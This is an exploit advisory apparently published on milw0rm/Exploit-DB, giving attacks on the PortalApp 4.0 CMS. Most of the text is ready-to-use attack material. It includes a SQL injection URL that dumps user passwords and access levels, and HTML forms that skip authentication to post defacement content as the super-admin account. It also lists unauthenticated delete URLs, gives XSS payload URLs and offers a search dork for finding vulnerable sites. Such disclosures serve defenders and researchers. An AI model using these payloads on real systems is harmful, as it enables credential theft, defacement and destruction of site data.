ad

portalapp 4.0 (sql/xss/auth bypasses) Multiple Vulnerabilities



EDB-ID: 4848 CVE: 2008-4612 OSVDB-ID: 42761
Author: r3dm0v3 Published: 2008-01-06 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##############################################################################
#Title: PortalApp 4.0 Multiple vulnerabilities                               #
#                                                                            #
#Discovered By: r3dm0v3                                                      #
#               http://r3dm0v3.persianblog.ir                                #
#               r3dm0v3( 4t }yahoo[dot}com                                   #
#               Tehran - Iran                                                #
#                                                                            #
#Vendor: http://www.portalapp.com                                            #
#Vulnerable Version: 4.0, prior versions maybe vulnerable                    #
#Remote Exploit: Yes                                                         #
#Dork: "Copyright @2007 Iatek LLC"                                           #
#Fix: Not Available                                                          #
##############################################################################

##############################################################################
#                       SQL Injection (CRITICAL)                             #
##############################################################################
#Description:
PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!

#Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users

author will be usernames
topic will be passwords
replies will be username IDs
views will be access levels (5 is super admin)


##############################################################################
# Following actions in 'forum.asp' can take done without any authentication. #
##############################################################################
create a forum:
<html>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
 Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
 ForumSection:<input type=text name=ForumSection value="Hacked"><br>
 DisplayOrder:<input type=text name=DisplayOrder value=1><br>
 <input type=submit>
</form>
</html>

create a topic:
<html>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumID:<input type=text name=ForumId value=><br>
 Subject:<input type=text name=Subject value="r3dm0v3."><br>
 Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
 Icon:<input type=text name=Icon value=14><br>
 Show Signature:<input type=text name=Showsignature value=0><br>
 Notify:<input type=text name=Notify ><br>
 Locked:<input type=text name=Locked value=1><br>
 Sticky:<input type=text name=Sticky ><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 DateLast:<input type=text name=DateLast value="6/1/2008"><br>
 <input type=submit>
</form>
</html>

delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]

#There some other actions:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies


##############################################################################
#Following actions in 'Content.asp' can take done without any authentication.#
##############################################################################
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
 catID:<input type=text name=CatID value=198><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 Author:<input type=text name=Author value=r3dm0v3><br>
 title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
 ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
 LongDesc:<br><textarea rows=4 cols=50  name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
 relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
 DownloadURL:<input type=text name=DownloadURL><br>
 Filename:<input type=text name=Filename><br>
 Thumbnail:<input type=text name=Thumbnail><br>
 Image1:<input type=text name=Image1><br>
 PrevContentID:<input type=text name=PrevContentId><br>
 NextContentID:<input type=text name=NextContentId><br>
 views:<input type=text name=Impressions value=10000><br>
 AVGRating:<input type=text name=AvgRating value=10000><br>
 <input type=submit>
</form>
</html>

'insert_detail_content' is also vulnerable. Use above html code for exploit


##############################################################################
#                                   XSS                                      #
##############################################################################
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1

# milw0rm.com [2008-01-06]